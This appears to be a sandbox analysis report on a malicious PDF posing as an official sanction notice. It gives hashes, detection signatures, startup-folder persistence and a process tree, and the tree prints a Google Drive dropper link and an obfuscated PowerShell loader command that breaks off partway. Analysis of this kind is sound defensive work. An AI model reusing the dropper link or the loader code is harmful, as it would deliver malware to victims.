d7d0a5f88b8d3660144c7df7b32d4ea1151ccc255a356839cbc5a2637b5d66a0

Analysis

max time kernel
94s
max time network
96s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
06-12-2024 00:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OFICIO 023 POSIBLE SANCIÓN E INHABILIDAD DEL CARGO.pdf
Size

60KB
MD5

5cc6a0590df5c2d11054e648427f551b
SHA1

ea31839c9f7bdddde3e8b20e44408cefb885c285
SHA256

d1b3251e0896d300fe8764d0e820c2707515f27364e28115b7e7392274cfa10d
SHA512

51c5bde8ea5482e318aebc06968a9cdce83575d3c06ada3a958962448431af31a5a906d95f172a544ff79fdc16aa09c97066b7d2bdc9f6fec42620e681cb97e6
SSDEEP

768:hghgubg2NEdvvEbaXtgX5VG2/fOHxEYrqGSyLN2hBicL5ughpzT8LiADuVXIA0N:ChgSgyov5tCVGXEYrq8JMBJDp8LvGXMN

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 17 IoCs

flow	pid	Process
34	2564	WScript.exe
35	2160	powershell.exe
37	2160	powershell.exe
42	2776	WScript.exe
43	2456	powershell.exe
44	2456	powershell.exe
57	2144	WScript.exe
58	2440	WScript.exe
59	2036	WScript.exe
60	2484	WScript.exe
61	1628	WScript.exe
63	1312	WScript.exe
64	2612	WScript.exe
65	1288	WScript.exe
66	1716	WScript.exe
67	3348	powershell.exe
68	3348	powershell.exe

Drops startup file 9 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 35 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2084	powershell.exe
1984	powershell.exe
1796	powershell.exe
2688	powershell.exe
3204	powershell.exe
3348	powershell.exe
2160	powershell.exe
2948	powershell.exe
2028	powershell.exe
1940	powershell.exe
780	powershell.exe
3356	powershell.exe
316	powershell.exe
2736	powershell.exe
1748	powershell.exe
2456	powershell.exe
2508	powershell.exe
1916	powershell.exe
1788	powershell.exe
2596	powershell.exe
3116	powershell.exe
3920	powershell.exe
2996	powershell.exe
3996	powershell.exe
2316	powershell.exe
3620	powershell.exe
1784	powershell.exe
3100	powershell.exe
3708	powershell.exe
3852	powershell.exe
1164	powershell.exe
1516	powershell.exe
1672	powershell.exe
1608	powershell.exe
2416	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
67	drive.google.com
3	drive.google.com
6	drive.google.com
7	drive.google.com
35	drive.google.com
43	drive.google.com

Drops file in Windows directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = d06dc4a37647db01	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a907cc1344750743988d8bab481dbfbf000000000200000000001066000000010000200000003cb89a1bdd18a8114088059e0804585f14153b19b64281e27ab1c3a7de6ef08d000000000e800000000200002000000092489a5770b35081354b986bbd71b065888aaf3d0f35c696a801ff384bcda8f02000000093db0243b71d8dc1c3726f1bbc6cb5622aee5e104ed22e21970cab4dfe325b6540000000636398e6b80643ba32d15d08556de40f0b5a8d44c0c85a6acc4641bb024035e4792d7d89ebbcea6148de7614b7d94932a338fc91617e8b4447f413d82f0019dd	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{DAA028D1-B369-11EF-8F09-6AE97CBD91D4} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d05c58b27647db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439607137"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a907cc1344750743988d8bab481dbfbf00000000020000000000106600000001000020000000c7e61c58498c920b610a5e372bbefd0ec5c7651ae94505f43e8eeb4faf25af31000000000e80000000020000200000004c2a7fa963c8cd7a0205459adb1498bcd332414f45ef44286a9b2403a519f40c90000000abaa4e67763309b8c5f4a02ad9cb487d5502c9d5fb66c47100f24d2f344ff4b406b672c475c55f1fc29f48e126b24ac68157e4f45a7637a8d989ffcd939e82c1dd509e6b03b3c2c1350ae794f6607fbb3ea6c07e4d49267005f83de01e84fbb9207195630450c9352c3afe86c5e8410b7082342a8a1f0dcd776fae1e77276a7a208e1c4c6360f25d39dbc4760f3e75aa400000000bf684f9cd499e0ef3b46ba42b3a08f7e4f31989a2456273aad4db5e91aadcb63710994d3910ffd1b225d7739ba01e405905957d6c4aa19371f93c2b66011c12	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe

Script User-Agent 11 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	61	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	64	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	34	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	59	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	60	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	62	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	65	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	42	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	57	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
316	powershell.exe
2160	powershell.exe
1220	powershell.exe
1164	powershell.exe
2996	powershell.exe
2456	powershell.exe
1748	powershell.exe
2948	powershell.exe
2028	powershell.exe
1940	powershell.exe
1452	powershell.exe
1516	powershell.exe
1052	powershell.exe
2316	powershell.exe
2508	powershell.exe
780	powershell.exe
2736	powershell.exe
1916	powershell.exe
840	powershell.exe
1788	powershell.exe
1672	powershell.exe
2596	powershell.exe
2960	powershell.exe
1860	powershell.exe
1608	powershell.exe
1784	powershell.exe
2084	powershell.exe
1984	powershell.exe
1796	powershell.exe
2688	powershell.exe
1332	powershell.exe
3100	powershell.exe
3116	powershell.exe
3204	powershell.exe
3348	powershell.exe
3368	powershell.exe
3356	powershell.exe
3568	powershell.exe
3620	powershell.exe
3708	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2172	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

description	pid	Process
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	3116	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	3348	powershell.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2780	iexplore.exe
2780	iexplore.exe
2780	iexplore.exe
2780	iexplore.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
2172	AcroRd32.exe
2172	AcroRd32.exe
2172	AcroRd32.exe
2172	AcroRd32.exe
2780	iexplore.exe
2780	iexplore.exe
2920	IEXPLORE.EXE
2920	IEXPLORE.EXE
2920	IEXPLORE.EXE
2920	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2172 wrote to memory of 2780	2172	AcroRd32.exe	31
PID 2172 wrote to memory of 2780	2172	AcroRd32.exe	31
PID 2172 wrote to memory of 2780	2172	AcroRd32.exe	31
PID 2172 wrote to memory of 2780	2172	AcroRd32.exe	31
PID 2780 wrote to memory of 2920	2780	iexplore.exe	32
PID 2780 wrote to memory of 2920	2780	iexplore.exe	32
PID 2780 wrote to memory of 2920	2780	iexplore.exe	32
PID 2780 wrote to memory of 2920	2780	iexplore.exe	32
PID 2780 wrote to memory of 2564	2780	iexplore.exe	34
PID 2780 wrote to memory of 2564	2780	iexplore.exe	34
PID 2780 wrote to memory of 2564	2780	iexplore.exe	34
PID 2564 wrote to memory of 316	2564	WScript.exe	35
PID 2564 wrote to memory of 316	2564	WScript.exe	35
PID 2564 wrote to memory of 316	2564	WScript.exe	35
PID 316 wrote to memory of 2160	316	powershell.exe	37
PID 316 wrote to memory of 2160	316	powershell.exe	37
PID 316 wrote to memory of 2160	316	powershell.exe	37
PID 2160 wrote to memory of 1220	2160	powershell.exe	40
PID 2160 wrote to memory of 1220	2160	powershell.exe	40
PID 2160 wrote to memory of 1220	2160	powershell.exe	40
PID 1220 wrote to memory of 2988	1220	powershell.exe	41
PID 1220 wrote to memory of 2988	1220	powershell.exe	41
PID 1220 wrote to memory of 2988	1220	powershell.exe	41
PID 2160 wrote to memory of 1164	2160	powershell.exe	42
PID 2160 wrote to memory of 1164	2160	powershell.exe	42
PID 2160 wrote to memory of 1164	2160	powershell.exe	42
PID 2780 wrote to memory of 2776	2780	iexplore.exe	43
PID 2780 wrote to memory of 2776	2780	iexplore.exe	43
PID 2780 wrote to memory of 2776	2780	iexplore.exe	43
PID 2776 wrote to memory of 2996	2776	WScript.exe	44
PID 2776 wrote to memory of 2996	2776	WScript.exe	44
PID 2776 wrote to memory of 2996	2776	WScript.exe	44
PID 2996 wrote to memory of 2456	2996	powershell.exe	46
PID 2996 wrote to memory of 2456	2996	powershell.exe	46
PID 2996 wrote to memory of 2456	2996	powershell.exe	46
PID 2780 wrote to memory of 2144	2780	iexplore.exe	47
PID 2780 wrote to memory of 2144	2780	iexplore.exe	47
PID 2780 wrote to memory of 2144	2780	iexplore.exe	47
PID 2144 wrote to memory of 1748	2144	WScript.exe	48
PID 2144 wrote to memory of 1748	2144	WScript.exe	48
PID 2144 wrote to memory of 1748	2144	WScript.exe	48
PID 1748 wrote to memory of 2948	1748	powershell.exe	50
PID 1748 wrote to memory of 2948	1748	powershell.exe	50
PID 1748 wrote to memory of 2948	1748	powershell.exe	50
PID 2780 wrote to memory of 2440	2780	iexplore.exe	51
PID 2780 wrote to memory of 2440	2780	iexplore.exe	51
PID 2780 wrote to memory of 2440	2780	iexplore.exe	51
PID 2440 wrote to memory of 2028	2440	WScript.exe	52
PID 2440 wrote to memory of 2028	2440	WScript.exe	52
PID 2440 wrote to memory of 2028	2440	WScript.exe	52
PID 2028 wrote to memory of 1940	2028	powershell.exe	54
PID 2028 wrote to memory of 1940	2028	powershell.exe	54
PID 2028 wrote to memory of 1940	2028	powershell.exe	54
PID 2948 wrote to memory of 1452	2948	powershell.exe	55
PID 2948 wrote to memory of 1452	2948	powershell.exe	55
PID 2948 wrote to memory of 1452	2948	powershell.exe	55
PID 1452 wrote to memory of 1968	1452	powershell.exe	56
PID 1452 wrote to memory of 1968	1452	powershell.exe	56
PID 1452 wrote to memory of 1968	1452	powershell.exe	56
PID 2948 wrote to memory of 1516	2948	powershell.exe	57
PID 2948 wrote to memory of 1516	2948	powershell.exe	57
PID 2948 wrote to memory of 1516	2948	powershell.exe	57
PID 1940 wrote to memory of 1052	1940	powershell.exe	58
PID 1940 wrote to memory of 1052	1940	powershell.exe	58

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\OFICIO 023 POSIBLE SANCIÓN E INHABILIDAD DEL CARGO.pdf"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://drive.google.com/uc?export=download&id=11nVbq2UgMNA2v7KArGjfm6GWTf37Rv2A
  2⤵
  - Modifies Internet Explorer Phishing Filter
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2920
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:2564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 